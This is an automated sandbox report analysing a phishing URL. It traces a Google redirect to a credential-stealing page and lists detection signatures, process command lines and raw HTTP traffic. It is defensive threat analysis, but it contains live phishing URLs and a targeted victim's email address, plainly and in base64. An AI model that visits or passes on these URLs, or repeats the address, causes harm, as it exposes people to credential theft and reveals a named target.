Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=

Overview

General Information

Sample URL:https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/
Analysis ID:1541538
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Phishing site detected (based on shot match)
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,9108029125192006270,4692683740069077808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://fkmd.lioninkey.com/6ysw/#Xjordan.black@learfield.comMatcher: Template: captcha matched
Source: https://www.asos.com/HTTP Parser: Base64 decoded: <svg width="80" height="24" xmlns="http://www.w3.org/2000/svg"><symbol id="a" viewBox="0 0 23 24"><path d="M5.076 12.017c0-3.814 2.328-7.509 6.521-7.509 4.194 0 6.522 3.695 6.522 7.51 0 10.098-13.043 10.095-13.043 0Zm17.918-7.521V.603h-4.875v1.514C16.127....
Source: https://fkmd.lioninkey.com/6ysw/#Xjordan.black@learfield.comHTTP Parser: No favicon
Source: https://fkmd.lioninkey.com/6ysw/#Xjordan.black@learfield.comHTTP Parser: No favicon
Source: https://fkmd.lioninkey.com/6ysw/#Xjordan.black@learfield.comHTTP Parser: No favicon
Source: https://www.sephora.com/HTTP Parser: No favicon
Source: https://www.asos.com/HTTP Parser: No favicon
Source: https://www.asos.com/HTTP Parser: No favicon
Source: https://www.asos.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.uk to http://we4uproducts.com/cbb/lld/jjg/5bvvni7cfj4hfuhwzvvda7dk/am9yzgfulmjsywnrqgxlyxjmawvszc5jb20=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.uk to http://we4uproducts.com/cbb/lld/jjg/qmrw45kikadmj3akt1hidmvs/am9yzgfulmjsywnrqgxlyxjmawvszc5jb20=
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global trafficHTTP traffic detected: GET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: www.google.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: www.google.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
Source: global trafficHTTP traffic detected: GET /6ysw/ HTTP/1.1Host: fkmd.lioninkey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://we4uproducts.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d45361ad96c58&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fkmd.lioninkey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fkmd.lioninkey.com/6ysw/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJhYXArdXlCalZsZlhTd1N4eTNUOFE9PSIsInZhbHVlIjoicnlzNFNWN2RKRks0cHAvcHg0aVBBK2ZncnZBdzBKU09yeG5SVm0rZFc5ejJ0eVdBbEFjdFpjUWZXNCtVOWFOZ2ZURVB6OFlhdUVEcW5tdkhlUFVub2ptWDloYXM0ZGlVOVhOUFVUTWZSY1FublBMZndIK0NNdnNWMGZEQ2ZoQTMiLCJtYWMiOiI2ZWY3NjJlZWI3OTA2ZWViMGMyNTRjODE3MDIzOTYyNzQzMzgyNmEzMjcxY2ZhOTA5NTljNDEyNjY4ZDgxM2QyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkMyREpkMFVPTWR1aEI3bUZSMnc0NXc9PSIsInZhbHVlIjoiN215UFpuYzhHc05KZ1FZTWNKMU5YN1dNL2tWb1dXcmNaalJKckpDcys2MU53SVZiZmVRengwQmNGaVVYWmc5bWErQUpkT3QwVjlaMkVpNUxHbW1BYnR0dHpjTVlCWUdEcC9nVjA5UCtCSWVoTUZSNGUxdnJ5LzRzT0g1RG5vaksiLCJtYWMiOiJmYmFlMTk0NTg2MmE2Zjg5YjA0Yzk5MDM5M2JhNDJmNmFkZTY2ZGJkN2E4ZDQxMDdjM2M2YjhiYjlkMGZjM2JlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d45361ad96c58&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7d45361ad96c58/1729807550390/Mp4zHOK1XWJgEfH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+7WnBV4zh2d+Rfg&MD=NKxfPlDA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7d45361ad96c58/1729807550390/Mp4zHOK1XWJgEfH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7d45361ad96c58/1729807550392/4220556c1318bf1b7fb6ed3eff5519f4e1039a0300343b990bcf733826bdd4cb/f0mV01aRHabiiK- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /36974546827917592623PukShACTIFUUXHNFZJZLOOOMQZMXHGUSGNHIYBAXZDFLHJUFPX HTTP/1.1Host: cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://fkmd.lioninkey.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fkmd.lioninkey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /36974546827917592623PukShACTIFUUXHNFZJZLOOOMQZMXHGUSGNHIYBAXZDFLHJUFPX HTTP/1.1Host: cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
